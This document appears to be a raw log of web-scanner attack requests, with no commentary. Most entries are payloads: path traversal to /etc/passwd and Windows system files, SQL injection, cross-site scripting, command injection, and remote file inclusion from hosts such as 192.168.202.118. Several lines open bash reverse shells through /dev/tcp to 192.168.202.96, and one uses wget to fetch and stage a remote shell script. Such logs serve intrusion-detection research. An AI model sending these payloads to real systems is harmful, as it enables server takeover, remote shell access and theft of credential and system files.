/\xd0\x9a\xd0\xbe\xd0\xbc\xd0\xbf'\xd1\x8e\xd1\x82\xd0\xb5\xd1\x80\xd0\xb8/ /javascript/.htaccess/skipfish://invalid/;? /h4bi26jd.mscgi? /scs86g1p.aspx? /byrg33fw.kspx? / /qhvu0pdg.html? /top.php?stuff="&ver >q85227619&rem /phpmyadmin/mapserv.exe?map=mapserver_detect.nasl.map /cgi-bin/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /edv3mapy.cfm? /gallery/search.php?searchstring= /8x6w469u.aspx? /phpmyadmin/whois.cgi?action=load&whois=;id /top.php?stuff="&rm\x09q42671474&rem\x09 /main.php?stuff="&rm q89179194&rem /examples/jsp/jsp2/el/search.cgi?..\..\..\..\..\..\windows\win.ini /psynch/nph-psf.exe?css=http://192.168.202.118:8080/2aibfaczmac8? / /examples/servlets/servlet/help.php?section='qualiteam_xcart_sql_xss.nasl /iajtej82.nsf? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+00+00+00+00+00+00+00+01+00+00+0e+1f+ba+0e+00+b4+09+cd+21+b8+01++>>esbq /scripts/2sfdqydfaknx.php3 /9ko6m4c8.asp? /phpmyadmin/item.fts?href=">; /cacti/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd /tuwjta1w.cfc? /uwiyxrvhad.exe /d44uk9h2.kspx? /recordings/fxm.exe /examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.copy /cgi-bin/forum_2.php?msg=10&return= /scripts/misc.php?action=login /ywaxntrx.php? /ny1b3qq4.fts? ////////../../../../../../etc/passwd /d7ktpmcq.x? /examples/servlets/servlet/sources/functions.php?root_path=/etc/passwd\x00 /o1zj4u9v.cgi? /examples/jsp/error/kernel/loadkernel.php?installpath=/etc/passwd\x00 /seventeen's - boots camp/ /javascript/log4j.exe /phprocketaddin/?page=../../../../../../../../../../boot.ini /twiki/bin/view/main/twikiusers?rev=865 `0<&44-;exec 44<>/dev/tcp/192.168.202.96/7131;sh <&44 >&44 2>&44`# /manager/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st=' /examples/jsp/sessions/webadmin.php?show=/etc/passwd /scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,526188729179,4,5,6,7,8,9,10,11-- /javascript/document.save /main.php?logout="&rm q52615858&rem /fnwhrxyd.html? /nmw0do67.dll? /examples/jsp/jsp2/jspx/ovlaunch.exe /javascript/servlet.exe /main.php?logout='\x0asleep 11 # /phpmyadmin/documentation.html?phpmyadmin=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd /merengue / /help.php?q="ping\xa0-w\xa010000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /scripts/wxrdqnkjuwmu.php /scripts/login.php?user="> /script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl? /help.php?q="&del\x0cq17127645&rem\x0c /scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1434187354-- /t7tm4m0b.idc? /manager/showcat.php?cat=1' /d5a5renl.htm? /top.php?stuff="\x0drm q93764844 # /scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332008331 /news-script/ /javascript/operations.exe /top.php?stuff="&ping\x0c-w\x0c7000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c /fc9t54l7.pl? /evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- /main.php?logout="&rm\x09q14643294&rem\x09 /uvazfs7p.cgi? ftp://ftp/* /fpnpp5zg.kspx? /examples/jsp/cal/texis.exe/nessus /scripts/9pen4xzgztjn.shtml /qhvu0pdg.nsf? /subscriptionconfirm/ /9kr0ih0v.x? /r3le3om5.mscgi? /x7pclv4s.asp? /fmnveedu.htm? /javascript/_res.exe /xlj7h65o.fts? /help.php?q='\x0ddel\x09q57419215\x09# /script/_conf/core/common-tpl-vars.php?confdir=http://192.168.202.118:8080/tzhfyzkbomspvm?? /javascript/this.exe /templates/form_header.php?noticemsg= /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/bin/echo+-en+"\0174\0044\0000\0377\0347"+>>+/tmp/ftxarcvjda0;')."]=1 /script/template/index.php?main_page_directory=http://192.168.202.118:8080/moclyxlwqyfjnp? /phpmyadmin//.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\windows/win.ini /cgi-bin/cgitest.exe /examples/servlets/servlet/sendtemp.pl?templ=../../../../../etc/passwd ..\\..\\..\..\\..\..\\..\..\\\boot.ini /scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919011,1,921952561-- /p043snfr.dll? /client/vmware-viclient.exe /siteserver/knowledge/default.asp?ctr=\"> /scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- /script/tick/test.php?path_to_code=http://192.168.202.118:8080/zz5thkvtmlgl? /cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd /recordings/awstatstotals.php?sort="].phpinfo().exit().$a[" /help.php?q="del q11698793 # /r3le3om5.exe? /<4429ea00/ /9ko6m4c8.do? /egaet53a.do? /javascript/array.exe /help.php?q="&del\xa0q16679515&rem\xa0 /cacti/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00 /examples/jsp/error/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini /phpmyadmin/webadmin.php?show=/etc/passwd /3hlysl2x.html? /en-us/account/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00 /help.php?q="&del q86798622&rem /examples/jsp/error/index.php?cat_select= /apavxugx.aspx? /scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'-- /newsarchive.php?path_to_script=http://192.168.202.118:8080/zz5thkvtmlgl??&cmd=ls /manager/zpanel.php?page=/etc/passwd\x00 /examples/jsp/jsp2/jspx/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /javascript/.passwd.ep /en-us/ddoworrl.dll? /sgdynamo.exe?htname=sgdynamo.exe /javascript/u.exe /main.php?stuff="|ping -w 8000 -n 1 1.2.3.4|rem /scripts/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00 /cgi-shl/win-c-sample.exe /javascript/faculty.exe /d7ktpmcq.aspx? /scripts/index.php?gadget=glossary&action=viewterm&term= /javascript/.htaccess.sfish/.htaccess.aspx-->">'>'" /scripts/h3d1n9eaqxv3.asp /i686v90l.exe? /5o9zq43e.exe? /miz4r5hz.idc? /zmvq66jy.aspx? /examples/jsp/jsp2/el/mlog.html?screen=/etc/passwd /main.php?stuff=&ver\x0c>q42577666&rem\x0c /help.php?q='\x0duname\x09>q85664498\x09# /examples/jsp/cal/direct.php?rf=/etc/passwd\x00 /javascript/counters.exe /search/submit.php?config["sipssys"]=http://192.168.202.118:8080/zz5thkvtmlgl? /en-us/esmozg5d.pl? /main.php?stuff="|ping;-w;11000;-n;1;4.3.2.1|rem; /scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file¤tfolder=/fckeditor_currentfolder_file_upload-1332010431.php. /modif_infos.asp?n=/../../../../../../../../../etc/passwd /link-description/ /pxagj7n7.php? /examples/jsp/checkbox/myevent.php?myevent_path=/etc/passwd\x00 /examples/jsp/jsp2/el/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00 /manager/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /h5i6crm3.cgi? /en-us/33y9gcqq.mscgi? /examples/jsp/error/showcat.php?cat=1' /u95h6ymu.html? /scripts/login.aspx /..../..../..../..../..../..../..../..../..../..../..../..../etc/passwd /jujgxwav.do? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+04+00+00+00+00+00+00+00+00+40+00+00+00+04+00+00+00+00+00+00+02+00++>>esbq /en-us/account/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /that's that/ /phpmyadmin/javascript.php?abs_path=/etc/passwd\x00 /examples/jsp/colors/webdist.cgi?distloc=;id /cgi/htimage.exe/path/filename?2,2 /main.php?stuff="&rm\x09q71999354\x09# /rbec2ohx.mscgi? /forums/index.php?board=;action=login2&user=username&cookielength=120&passwrd=password /edzaia0i.php3? /javascript/high.exe /index.php?op=default&date=200607' union select 1,1990910236,1,1,1,1,1,1,1,1--&blogid=1 /test.php?evalme=eval($_server[http_x_efjcfccjtkphmyk]); /h5i6crm3.idc? /examples/jsp/num/phpnews/sendtofriend.php?mid='1' /cacti/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /javascript/cnf.exe /cgi.cgi/query?mss=../config /examples/jsp/jsp2/jspx/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- /en-us/odzk29aa.html? /e9rx3ya4.cfc? /cgi-sys/gwweb.exe?help=bad-request /en-us/hipkz026.html? /scripts/search/results.stm?indexname=>">&style=fancy&spage=60&query=folder name /emailsubscriptionservice/ /? /de3v2dd9.kspx? /scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5 /examples/jsp/jsp2/jspx/admin/admin.php?sid=' /x7pclv4s.php3? /cgi-win/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd| /rtpdumpscript/ /examples/servlets/servletmultihtml.pl?multi=/etc/passwd\x00html /javascript/1996.exe /components/com_mospray/scripts/admin.php?basedir=http://cirt.net/rfiinc.txt??&cmd=id /tuwjta1w.php? /search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script> /examples/jsp/sessions/secure.php?cfgprogdir=/etc/passwd\x00 /top.php?stuff=;rm\x09q62254247\x09# /javascript/tapestry.exe /phpmyadmin/welcome.php?custom_welcome_page=/etc/passwd\x00 /jscript.php?my_ms[root]=http://192.168.202.96:8080/4dckqcc0acprbz?? /order/login.php?svr_rootscript=http://192.168.202.118:8080/zz5thkvtmlgl? /t7tm4m0b.exe? /crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini /82q7ywa8.do? /kur'an-r0/ /1r8cfrlf.aspx? /nyvbv05h.nsf? /examples/jsp/sessions/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1 /examples/jsp/colors/sawmill6cl.exe?ho+{complete_version} /file_description/ /snippetmaster/includes/vars.inc.php?_session[script_path]=http://192.168.202.96:8080/4dckqcc0acprbz?? /5o9zq43e.cgi? /a0imiuf1.cfc? /en-us/n9xlumt5.nsf? /examples/jsp/error/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html /g8nu2yy7.do? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+c0+31+db+89+45+f0+8b+46+3c+8b+44+06+78+01+f0+83+c0+18+8b+10+89+55+f4+89+f2++>>ctdn /main.php?logout=&ver\x0c>q38243564&rem\x0c /raanw4ia.cfm? /cgi-bin/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd /d5a5renl.htm? /cgi-local/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /2000transcripts/ /top.php?stuff="ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /ap58k3ci.dll? /help.php?q=&rm;q75765892&rem; /gvx7m5ti.jspa? /main.php?logout=ver&rem; /scripts/xuicksry9grj.php /examples/jsp/checkbox/faq.php?action=&type=view&s=&id=-1' union select 0,337036838,0,0,0,0,0-- /3hlysl2x.htm? /javascript/engine.exe /examples/jsp/error/language.php?data_dir=/etc/passwd\x00 /h4bi26jd.cfm? /fpnpp5zg.jsp? /scripts/index.php?gadget=../../../../../../etc/passwd\x00&path=/etc /examples/servlets/servlet/admin/top.php?admindir=/etc/passwd\x00 /search.php?config["sipssys"]=http://192.168.202.96:8080/4dckqcc0acprbz? /scriptingnewsinxml/ /examples/jsp/error/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- /raanw4ia.fts? /speedscript/ /phpmyadmin/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd /zmvq66jy.cfm? /vmi8bb12.nsf? /scripts/formmail.pl /modules.php?set_albumname=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd /en-us/7o5qp766.cgi? /help.php?q='\x0dsleep\x097\x09# /examples/jsp/num/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd /fcgi-bin/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /main.php?stuff="ping,-w,8000,-n,1,4.3.2.1|rem, /top.php?stuff="&rm q85387982 # /xlj7h65o.do? /phpmyadmin/index.php?op=default&date=200607' union select 1,760917547,1,1,1,1,1,1,1,1--&blogid=1 /manager/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00 /transcript050506/ /i7prbs22.x? /oie504mr.aspx? /swisscom-xss/ / /examples/jsp/jsp2/el/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- /main.php?logout="\x0auname\x09# /nuh3zirz.fts? /javascript/oa_html.exe /mv8wxfy9.asp? /manual/servlets/scripts/servlet1/servform.htm /javascript/advanced.exe /scripts/rvckwz6smkqf.cgi /javascript/pro.exe /examples/jsp/checkbox/wa.exe?debug-show-version /en-us/7o5qp766.jspa? /main.php?logout=&ver;>q42123677&rem; /help.php?q="\x0arm\x09q45619595\x09# /scripts/namazu.cgi /scgi-bin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /examples/jsp/jsp2/jspx/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00 /awstatstotals.php?sort="].passthru('id').exit().$a[" /top.php?stuff='\x0asleep\x0910\x09# /phpmyadmin/phpmyadmin.css.php?collation_connection=utf8_general_ci&convcharset=utf-8&js_frame=right&lang=en-utf-8&nocache=3830415403&token='" /0qhcnefz.x? /examples/jsp/error/core/api.php?t_path_core=/etc/passwd\x00 /main.php?logout="del\x0bq12574322&rem\x0b /examples/jsp/colors/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd /techweb's rss feed/ /scripts/index.php?id='union/**/select/**/0,0,1511087781,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /main.php?logout='\x0adel q63177134 # /twiki/bin/view/main/twikiusers?rev=87518 `0<&152-;exec 152<>/dev/tcp/192.168.202.96/22811;sh <&152 >&152 2>&152`# /scripts/nslookup.cgi?query=localhost;id&type=any&ns= /insertorder.cfm?cfid=&cftoken=1'tst /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /news/include/createdb.php?langfile;=@rfiurl?langfile;=@rfiurl? /scripts/news.scr.php?globals[pth][classes]=http://192.168.202.118:8080/moclyxlwqyfjnp?? /wps/wcm/webinterface/login/login.jsp?"> //

/en-us/7o5qp766.x? /help.php?q="rm\x09q83132484&rem\x09 /scripts/base_local_rules.php?dir= /7dbjwpw6.kspx? /javascript/htpasswd.jpg /en-us/account/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331905213,113095511 -- /script/fckeditor/license.txt /0w155a7c.cgi? /top.php?stuff="ping,-w,11000,-n,1,1.2.3.4|rem, /let's-dance/ /scripts/event_view.php?eid=34 union select 1215611548 /phpmyadmin/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /iv5vkgam.idc? /top.php?stuff=";rm\x09q95359991\x09# /3j8echh0.do? /script-fu/ /pbserver/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\+/og /fcgi-bin/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf /ygkjkngd.html? /ewc3rz1l.dll? / /help.php?q="ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /examples/jsp/checkbox/directory.php?dir=;cat /etc/passwd /s7qus4g3.kspx? /examples/jsp/checkbox/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13-- /qb2xy9aw.jspa? /nyjgaorz.aspx? /examples/jsp/error/index.php?user_langue=../../../../../../../../../../etc/passwd /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/&frm_user=q37639343&scr_height=&scr_width= /awstats/awstats.pl?migrate=|echo;/./tmp/yzicxmyifv0 > /dev/null &;echo|awstats558782.txt /bn857frh.do? /athenareg.php?pass= ;id /ao22ww7y.aspx? /ygkjkngd.do? /top.php?stuff='&del\x09q47253924\x09# /examples/jsp/colors/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo /examples/jsp/colors/adodb/server.php?sql='adodb_sql_sql_injection.nasl /scripts/print.php?what=article&id=' /help.php?q="|ping,-w,10000,-n,1,1.2.3.4|rem, /scripts/zdbyw3dn3gh2.pl /javascript/internet.exe /main.php?logout='rm\x09q59958199\x09# /en-us/account/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini /examples/jsp/error/shopexd.asp?catalogid='42 /script_path/installation/index.php?mosconfig_absolute_path=http://cirt.net/rfiinc.txt?? /cgi-local/gw5/gwweb.exe?help=bad-request /jnt3f86c.cfm? /main.php?logout=;rm q17429254 # /examples/jsp/error/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00 /j4oqyvga.aspx? /main.php?stuff="ping\xa0-w\xa07000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /5qnlm5z2.exe? /scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1332008335,4,5 /o1zj4u9v.idc? /main.php?logout="del\x09q51755129&rem\x09 /main.php?stuff="&ver\x0b>q52976574&rem\x0b /examples/jsp/cal/starnet/addons/slideshow_full.php?album_name='336230542 /_vti_bin/..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c../winnt/system32/cmd.exe?/c+dir+c:\+/og /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332010411 /esmozg5d.pl? /code/inc_header.php?gtopnombre="> /scripts/wa.cgi?debug-show-version /6n7aacgg.php3? /interface/login/login_frame.php?site= /w4996nr0.cfm? /javascript/employees.exe /en-us/ /en-us/dda2qr7j.aspx? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/fppatbfqdp" /0u75ldxq.dll? /javascript/htpasswd.conf /examples/servlets/servlet/cgiwrap/cgiwrap_error_page_handling_xss.nasl /phpmyadmin/mylog.html?screen=/etc/passwd /cgi-bin/commerce.cgi?page=../../../../../etc/passwd\x00index.html /scripts/shop.plx/page=nessus838143127 /zmvq66jy.jsp? /h5i6crm3.asp? http://xxxxxxxxxxx.:80/.thtml /j734qobz.php3? /cacti/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd /subscriptions.js /quagynka.x? /ollydbg_ollyscripts/ /javascript/pm.exe /mailpasswd/ /tegenscript/ /mail.php?id='/**/union/**/select/**/1,2,1332010419,4--&blog=1 /j4rdyhw8.do? /eg2u8pbv.idc? /imprimer.asp?no=/etc/passwd|44|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'. /7u1pb2xi.html? /admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/4dckqcc0acprbz? /en-us/dda2qr7j.do? /bn857frh.exe? /wps/wcm/webinterface/login/login.jsp?"> /awstats/awstats.pl?migrate=|echo;/./tmp/xmefwyizyj0 > /dev/null &;echo|awstats852068.txt /mv8wxfy9.x? /javascript/.htpasswd.sfish/0000023456 /manager/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w /javascript/~mark.exe /fpnpp5zg.mscgi? /gvx7m5ti.fts? /webcgi/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go /scripts/lpzj75ztw9lb.html /scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/frznctvhi0i5? /help.php?q=uname >q93421292 # /5qnlm5z2.php? /6n7aacgg.kspx? /nmw0do67.cfm? /bxnyrhmh.htm? /j4drbkil.mscgi? /help.php?q="|ping\x0b-w\x0b8000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /scripts/weigh_keywords.php?etcdir=http://192.168.202.118:8080/tzhfyzkbomspvm? /606wkcop.php3? /examples/servlets/servlet/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00 /bemarket/postscript/postscript.php?p_mode=http://192.168.202.118:8080/zz5thkvtmlgl? /webdav/phprun.php?cmd=c:\wce.exe /javascript/document.do /cacti/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00 /scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 289896836-- /5qnlm5z2.aspx? /en-us/dda2qr7j.html? /scripts/tomcat_proxy_directory_traversal.nasl1331904240 /s7qus4g3.jsp? /examples/jsp/colors/man-cgi?section=0&topic=ls;id /apavxugx.do? /scripts/awstatstotals.php?sort="].phpinfo().exit().$a[" /bn857frh.php? /eg2u8pbv.cgi? /scripts?username="document.cookie="testzgnm=1183;" /help.php?q="&uname >q86369979 # /script_path/config.inc.php?_path=http://192.168.202.96:8080/whmch8ftkt7kv?? /main.php?stuff="ver\x0b>q67582951&rem\x0b /sitescope/cgi/go.exe/sitescope?account=administrator&logname=system&machine=&page=eventlog /www/delivery/ac.php?bannerid=-1331918977+or+1=1+--+';passthru(base64_decode($_server[http_nessus_bjmml9oq]));die;/* /en-us/account/demos/demo.browse.php?filename=/etc/passwd /jdx255ea.mscgi? /javascript/openjpa.exe /subscript/ /phpmyadmin/zpanel.php?page=/etc/passwd\x00 /en-us/account/source?v=../../../../../../../../../../etc/passwd\x00 /main.php?logout="del\x0bq77294234&rem\x0b /scripts/gallery.scr.php?globals[pth][func]=http://192.168.202.96:8080/4dckqcc0acprbz?? /usr/extensions/get_infochannel.inc.php?root_path=http://192.168.202.118:8080/ghl9il??cmd=id;pwd /examples/jsp/sessions/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog /examples/jsp/checkbox/index.php?sensor_program= /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+rcx>>ctdn /javascript/.passwd.png /awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/cbpxmnuvtn.sh;echo|awstats233118.txt /help.php?q="ping -w 10000 -n 1 1.2.3.4&rem //..\..\..\..\..\..\..\..\etc/passwd /qb2xy9aw.html? /help.php?q='\x0duname\x09# /examples/jsp/jsp2/el/fxm.exe /scripts/index.php?search=&function=search /profile.php?author_id='414156083542 /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332009306,0x3a,1514709258),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 /examples/jsp/checkbox/index.php?user_langue=../../../../../../../../../../etc/passwd /82q7ywa8.exe? /javascript/passwords.exe /recordings/check_user_id.php?user_id= /help.php?q="ping\x09-w\x099000\x09-n\x091\x091.2.3.4&rem\x09 /admin/index.php?msg=1&username="><" / /main.php?logout="&ver,>q91889862&rem, /dda2qr7j.cfm? /help.php?q="|ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c /main.php?stuff=";del\x09q74362376\x09# /main.php?stuff='\x0duname\x09# /main.php?logout="\x0asleep\x097\x09# /description/ /5o9zq43e.x? /scripts/sdbsearch.cgi?stichwort=anything /lib/dbman_filter.inc.php?lib_path=/etc/passwd\x00 /ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/no4ghqiguzhst?' /1qwv2p5p.aspx? /weq93ppb.htm? /j734qobz.cfc? /ghswfouu.exe? /examples/jsp/num/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'-- /scripts/ggvfa_wichxq.php /qhvu0pdg.kspx? /conscript/ /main.php?logout=&uname\x09>q12279742\x09# /top.php?stuff="&rm;q13316957&rem; /fa8p8lr8.php? /top.php?stuff='&sleep 10 # /admin/htmlarea/popups/file/files.php?q=&mode=apparel /examples/jsp/jsp2/jspx/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w /scripts/tinfo.php?id=1331918989 /main.php?logout='rm\x09q24187781\x09# /scripts/c0kha6w3apd3.php3 /vwmg565s.htm? /manager/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00 /.cgi / /u95h6ymu.asp? /script//ident/index.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl? /cgi-perl/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /manager/core/editor.php?editor_insert_bottom=/etc/passwd /virus-bursters.exe/ /javascript/framework.exe /script/menu/menuadministration.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm? /j4drbkil.mscgi? /igtf0zon.html? /recordings/ovlaunch.exe /top.php?stuff="&ver;>q13316957&rem; /ht8pn8uq.exe? /examples/jsp/num/calendar.php?serverpath=/etc/passwd\x00 /iisadmpwd/..\xc1%8s..\xc1%8s..\xc1%8s..\xc1%8s..\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\+/og /help.php?q=ver\x0b>q84117889&rem\x0b /cytherea's lipstick lesbians/ /82q7ywa8.idc? /hrttz9fj.jsp? /o35zot2r.htm? /top.php?stuff="rm\x0cq31638645&rem\x0c /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;/tmp/btnvlgnsgo;" /top.php?stuff="del\x0cq81327195&rem\x0c /scripts/gdxlwjnlsr6i.inc /bxnyrhmh.dll? /top.php?stuff=&ver\x0c>q57775181&rem\x0c /examples/jsp/jsp2/el/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00 /odipkt_description/ /examples/jsp/sessions/kb.cgi?view='&lang=en /transcript_list/ /cgi-bin/htsearch?exclude=`/etc/passwd` /archive.php?scriptpath=http://cirt.net/rfiinc.txt?? /examples/jsp/jsp2/jspx/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00 /error.php?selected_theme= /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../vtigerservice.php\x00 /transcript_gates/ /forum-ra_professionnel.asp?n=`/etc/passwd` /examples/jsp/sessions/profil.php?id=1 /news/include/createdb.php?langfile;=http://192.168.202.118:8080/tzhfyzkbomspvm?? /m5103snj.jsp? /examples/jsp/jsp2/el/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd /main.php?stuff="ping\x0c-w\x0c10000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c /blake's notebook/ /vwmg565s.php? /en-us/account/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl /javascript/trackers.exe /examples/jsp/sessions/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /zqqemp6j.mscgi? /cacti/config.php?path[docroot]=/etc/passwd\x00 /top.php?stuff=";uname # /pxagj7n7.fts? /awstats/awstats.pl?migrate=|echo;wget -p /tmp/ http://192.168.202.102:80/awsegghnxp7katggbebfod2cnizwaa/lcqujjmwty.sh;echo|awstats726723.txt /cgi-bin/starnet/addons/slideshow_full.php?album_name='123258797 /config.php?returnpath=/etc/passwd\x00 /en-us/ /examples/jsp/num/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h /javascript/example.exe /javascript/playlist.exe /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3fstuff%3d1861731255&frm_user=&scr_height=q25861218&scr_width= /um7xpn15.kspx? /bl8sefdm.pl? /javascript/index_2.exe /examples/jsp/cal/sawmillcl.exe?ho+{complete_version} /33y9gcqq.htm? /help.php?q="&rm\x0bq72412482&rem\x0b /top.php?stuff=ver\x0c>q95318168&rem\x0c /j4rdyhw8.nsf? /recordings/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; /demo/ms-pe02/catalog.php?cid=0&sid='"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.118:8080/ghl9il?& /nsn/..\util/copy.bas /eg2u8pbv.pl? /cgi-bin/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl /1qwv2p5p.nsf? /javascript/kids.exe /main.php?stuff="\x0ddel\x09q16681283\x09# /3hlysl2x.nsf? /help.php?q=';sleep\x0910\x09# /scripts/viewcvs.cgi/ /bzuf9ozq.mscgi? /6n7aacgg.htm? /top.php?stuff=ping;-w;9000;-n;1;4.3.2.1&rem; /a0imiuf1.asp? /counterscript/ /help.php?q="rm;q24461998&rem; /javascript/document.asmx /login.asp?sessionid=[">> /jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd /eei78ore.cfm? /top.php?stuff="ping\x09-w\x0910000\x09-n\x091\x094.3.2.1|rem\x09 /miz4r5hz.dll? /nuh3zirz.pl? /help.php?q='\x0adel q61886362 # /tuwjta1w.exe? /help.php?q="&uname >q34212187 # /submitmanuscript/ /v3axg1p8.nsf? /help.php?q="&rm\x0bq26193259&rem\x0b /examples/servlets/servlet/wa.exe?debug-show-version /examples/jsp/jsp2/jspx/awstatstotals.php?sort="].phpinfo().exit().$a[" /javascript/service.exe / /examples/jsp/error/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd /examples/jsp/sessions/search.jsp?q=%" /..\xc0\xaf/host-manager/html /h5i6crm3.cfc? /top.php?stuff="|sleep 9 # 